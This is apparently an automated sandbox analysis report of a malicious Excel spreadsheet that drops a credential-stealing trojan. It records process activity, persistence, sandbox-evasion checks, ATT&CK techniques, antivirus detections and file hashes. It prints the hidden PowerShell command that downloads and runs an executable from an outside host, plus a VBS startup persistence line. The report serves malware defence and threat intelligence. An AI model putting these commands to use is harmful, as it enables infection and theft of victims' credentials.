              Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_023A363B push es; retf 8_2_023A3641
              Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_023A35F0 push ecx; retf 8_2_023A35F6
              Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_054035A6 push edi; retf 8_2_054035AC
              Source: tmp7752.exe.2.dr Static PE information: section name: .text entropy: 7.764858525500812
              Source: svcost.exe.5.dr Static PE information: section name: .text entropy: 7.764858525500812

              Persistence and Installation Behavior

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\tmp7752.exe
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe File created: C:\Users\user\AppData\Roaming\svcost.exe

              Boot Survival

              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svcost.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: tmp7752.exe, 00000005.00000002.489076925.0000000002882000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Memory allocated: 200000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Memory allocated: 2820000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Memory allocated: 450000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Memory allocated: 5450000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Memory allocated: 17450000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\svcost.exe Memory allocated: 250000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\svcost.exe Memory allocated: 2490000 memory reserve | memory write watch
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\svcost.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2067
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3692 Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3696 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe TID: 3776 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe TID: 3780 Thread sleep count: 113 > 30
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe TID: 3780 Thread sleep count: 163 > 30
              Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 3948 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 3956 Thread sleep count: 165 > 30
              Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 3964 Thread sleep count: 130 > 30
              Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
              Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
              Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\
              Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
              Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
              Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\
              Source: svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
              Source: svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Code function: 5_2_0020ECA8 LdrInitializeThunk,5_2_0020ECA8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Process token adjusted: Debug
              Source: C:\Users\user\AppData\Roaming\svcost.exe Process token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\tmp7752.exe "C:\Users\user\AppData\Local\Temp\tmp7752.exe"
              Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\svcost.exe "C:\Users\user\AppData\Roaming\svcost.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Queries volume information: C:\Users\user\AppData\Local\Temp\tmp7752.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\svcost.exe Queries volume information: C:\Users\user\AppData\Roaming\svcost.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match File source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTR
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information331
              Scripting
              Valid Accounts13
              Exploitation for Client Execution
              331
              Scripting
              1
              DLL Side-Loading
              1
              Disable or Modify Tools
              OS Credential Dumping2
              File and Directory Discovery
              Remote Services11
              Archive Collected Data
              2
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              11
              Process Injection
              1
              Deobfuscate/Decode Files or Information
              LSASS Memory13
              System Information Discovery
              Remote Desktop ProtocolData from Removable Media11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Scheduled Task/Job
              1
              Scheduled Task/Job
              1
              Scheduled Task/Job
              3
              Obfuscated Files or Information
              Security Account Manager21
              Security Software Discovery
              SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell
              2
              Registry Run Keys / Startup Folder
              2
              Registry Run Keys / Startup Folder
              1
              Install Root Certificate
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture13
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing
              LSA Secrets31
              Virtualization/Sandbox Evasion
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading
              DCSync1
              Remote System Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Modify Registry
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
              Virtualization/Sandbox Evasion
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
              Process Injection
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Behavior Graph ID: 1562381 | Sample: 7qsPAygCOx.xlsx | Startdate: 25/11/2024 | Architecture: WINDOWS | Score: 100
              • Sample signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 15 other signatures
              • EXCEL.EXE (started): dropped C:\Users\user\Desktop\~$7qsPAygCOx.xlsx (data); started powershell.exe. Signature: Suspicious powershell command line found
              • powershell.exe (started by EXCEL.EXE): DNS/IP cia.tf, 104.21.1.182, 443, 49163, CLOUDFLARENETUS, United States; dropped C:\Users\user\AppData\Local\...\tmp7752.exe (PE32); started tmp7752.exe. Signatures: Installs new ROOT certificates; Powershell drops PE file
              • tmp7752.exe (started by powershell.exe): dropped C:\Users\user\AppData\Roaming\svcost.exe (PE32) and C:\Users\user\AppData\Roaming\...\svcost.vbs (ASCII). Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Drops VBS files to the startup folder; 2 other signatures
              • wscript.exe (started): started svcost.exe. Signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
              • svcost.exe (started by wscript.exe). Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file

              Source | Detection | Scanner | Label
              7qsPAygCOx.xlsx | 47% | ReversingLabs | Win32.Trojan.Generic
              7qsPAygCOx.xlsx | 100% | Avira | VBA/Dldr.Agent.MR
              7qsPAygCOx.xlsx | 100% | Avira | HEUR/Macro.Downloader.ARIM.Gen
              7qsPAygCOx.xlsx | 100% | Joe Sandbox ML |

              Source | Detection | Scanner | Label
              C:\Users\user\AppData\Roaming\svcost.exe | 100% | Avira | HEUR/AGEN.1310409
              C:\Users\user\AppData\Roaming\svcost.exe | 100% | Joe Sandbox ML |
              C:\Users\user\AppData\Local\Temp\tmp7752.exe | 100% | Joe Sandbox ML |
              C:\Users\user\AppData\Local\Temp\tmp7752.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.RedLineStealer

              No Antivirus matches
              No Antivirus matches

              Source | Detection | Scanner | Label
              https://cia.tf | 0% | Avira URL Cloud | safe
              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exed | 0% | Avira URL Cloud | safe
              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;z | 0% | Avira URL Cloud | safe
              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile; | 0% | Avira URL Cloud | safe
              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe | 100% | Avira URL Cloud | malware
              http://cia.tf | 0% | Avira URL Cloud | safe
              https://cia.tf/2ed7362e959d42385d4e6d231a6840ddB. | 0% | Avira URL Cloud | safe

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              cia.tf | 104.21.1.182 | true | false | | high

              Name | Malicious | Antivirus Detection | Reputation
              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe | true | Avira URL Cloud: malware | unknown

              IP | Domain | Country | ASN | ASN Name | Malicious
              104.21.1.182 | cia.tf | United States | 13335 | CLOUDFLARENETUS | false
                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1562381
                                                                                      Start date and time:2024-11-25 15:05:58 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 8m 14s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                      Number of analysed new started processes analysed:12
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:7qsPAygCOx.xlsx
                                                                                      renamed because original name is a hash value
                                                                                      Original Sample Name:b416b3cd07533aa1e3f322bbf904be65df03dcf08507ef9a683271a3c4848025.xlsx
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.expl.evad.winXLSX@8/14@1/1
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 66.7%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 94%
                                                                                      • Number of executed functions: 520
                                                                                      • Number of non-executed functions: 30
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .xlsx
                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                      • Attach to Office via COM
                                                                                      • Scroll down
                                                                                      • Close Viewer
                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 104.208.16.93
                                                                                      • Excluded domains from analysis (whitelisted): onedsblobprdcus07.centralus.cloudapp.azure.com, watson.microsoft.com, legacywatson.trafficmanager.net
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 3532 because it is empty
                                                                                      • Not all processes were analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: 7qsPAygCOx.xlsx
                                                                                      Time      Type             Description
                                                                                      06:07:32  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs
                                                                                      09:07:09  API Interceptor  25x Sleep call for process: powershell.exe modified
                                                                                      09:07:18  API Interceptor  184x Sleep call for process: tmp7752.exe modified
                                                                                      09:07:40  API Interceptor  20x Sleep call for process: wscript.exe modified
                                                                                      09:07:43  API Interceptor  97x Sleep call for process: svcost.exe modified
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):6916
                                                                                          Entropy (8bit):4.765218321768022
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:Mxoe5AVFn3eGOVpN6K3bkkjo58gkjDt4iWN3yBGH+dcU6CIVsm5emd:RVoGIpN6KQkj2Lkjh4iUxV
                                                                                          MD5:665354A1A9139D1FA96E6FCC7F1FCE73
                                                                                          SHA1:8477F42550FBBA457D4015AAAC889272C7FAF1D8
                                                                                          SHA-256:146FDB9501A06132126EE69A643DDBF1222DE922D3B59E282BDE97AF5186CD01
                                                                                          SHA-512:F61A4F30A60A5F63619467D31D928ED428119EB4783ECFA7938A2213B879B3B17DD231389386319F5E756C0CDD075FF5B861646ECFF791D8AD1EA152F2B045CD
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........&.w.....w...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1^.......Test-Path........Limit-EventLog........Show-ControlPanelItem........Get-Content........Rename-
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):0.34726597513537405
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlll:Nll
                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:PNG image data, 1209 x 635, 8-bit/color RGB, non-interlaced
                                                                                          Category:dropped
                                                                                          Size (bytes):434291
                                                                                          Entropy (8bit):7.997330288407972
                                                                                          Encrypted:true
                                                                                          SSDEEP:12288:Kl3PBexJxH0cZtSlOSgjG3IWNqAvfTYxv253:K5PBexJJF2cSwG4ofTn53
                                                                                          MD5:DAE027B27EC83FBAEC24D5DFB4847433
                                                                                          SHA1:33BFCDF151B8CBD522256CC5B813549FE5EEB1D1
                                                                                          SHA-256:6C3FF9BA646AF527087B7CA1A9E93C2F06C7C0A4CC1A373C8DA4F0A868C7C319
                                                                                          SHA-512:380F4CD5671F96AFCFAD25E0E2198D7BEFC66A9A5E8715004DA35EB7220CF2FB190EDCB90B7E63F1A734B4862E063B17844D77456930302284953FF153647202
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Preview:1
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Preview:1
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1072096
                                                                                          Entropy (8bit):7.751716236673022
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:AY2YACYOYGYAAYAtY0YHYAkYAtYJYAAYoYA2YnYAqYDYAHONafeTZce9rlmxTfgX:UfeTZcYhmCBqKzSdG
                                                                                          MD5:2ED7362E959D42385D4E6D231A6840DD
                                                                                          SHA1:B3CC47AC92296D978FC991D9658C771F225DBF18
                                                                                          SHA-256:13CB2135790780947BE355C3C9ED42BE1987C9E64D6CD0C43A5A4C5AE289DC30
                                                                                          SHA-512:66553BB74D63E2D8BB47751F87F93DEE66C4ACBE647115DEA5148D6B301F0A6802AE972A3FC26C1BCF9412775F1FBFD6238C1B477F726E0386CDEF183551B758
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 68%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: DGTCkacbSz.xlsx, Detection: malicious, Browse
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):16384
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3::
                                                                                          MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                          SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                          SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                                          SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\tmp7752.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):81
                                                                                          Entropy (8bit):4.756456874631155
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:FER/n0eFHHoXp4EaKC51Hn:FER/lFHIPaZ5t
                                                                                          MD5:DFEF3C321A0EBAB536D6E3215B1DFC8B
                                                                                          SHA1:97E8201D0952F8980C30E7BB26A6AADFED16DD8F
                                                                                          SHA-256:5143DF7EB4C435AE42D52AA0B2A295F79285D28240DFEED796CB12D68BA4A347
                                                                                          SHA-512:006A719162E465A00FB08E1F2CE19667B9A53CA91585A39CAC675EECF4037ADEB44C3285CDA7610A292C591AA1BFF7EE4F6790BB8F769BDC64F9C27F2A0D61F1
                                                                                          Malicious:true
                                                                                          Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\svcost.exe"""
                                                                                          Process:C:\Users\user\AppData\Local\Temp\tmp7752.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):293066043
                                                                                          Entropy (8bit):7.999992280333326
                                                                                          Encrypted:true
                                                                                          SSDEEP:6291456:WiHxwPRNbYWvmzsoa3n9YMTDoBihjWh3ZGgCRXkAc+qv:W6URaiv39HTDqdprIkmqv
                                                                                          MD5:A210D6F3E1093395552CE55FA063E011
                                                                                          SHA1:0349F7AE3949931FB733CE38EA521C47B0349124
                                                                                          SHA-256:12CE74D8E1F68C394FC86A2882A3F15936FF0DB55EB1A2E807620524CF59A734
                                                                                          SHA-512:B451D3E9CA0CFB32871AA8A1EFE13CE9B8416363A1583EA719F931C73C341950644D5D3C6A60DE964498CCE467555F6957FCC11C4284B02041E3654BCC8FECFD
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:Microsoft Excel 2007+
                                                                                          Category:dropped
                                                                                          Size (bytes):449245
                                                                                          Entropy (8bit):7.993954682752184
                                                                                          Encrypted:true
                                                                                          SSDEEP:12288:wel3PBexJxH0cZtSlOSgjG3IWNqAvfTYxv25C:T5PBexJJF2cSwG4ofTn5C
                                                                                          MD5:2C317EE5FA188456BDBA04BEC0CA2B1A
                                                                                          SHA1:D4C074EB1B51BA2917C667473F925F7A953E6A21
                                                                                          SHA-256:BC011C9E45964F2C0D3F50F65F57DE24C1A3B0BF301E6BB17C9DBF5EE461D832
                                                                                          SHA-512:8689AE337C61B51C4FE59A1F8AB57E927BF4A73C3EEF1ACECE08F4DA0EC7CE1D99267B7EC321B04AF8F5769E4F31B80F0AAB7499023096F01D2DD319AE2CEC5A
                                                                                          Malicious:false
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:modified
                                                                                          Size (bytes):26
                                                                                          Entropy (8bit):3.95006375643621
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                          Malicious:false
                                                                                          Preview:[ZoneTransfer]....ZoneId=0
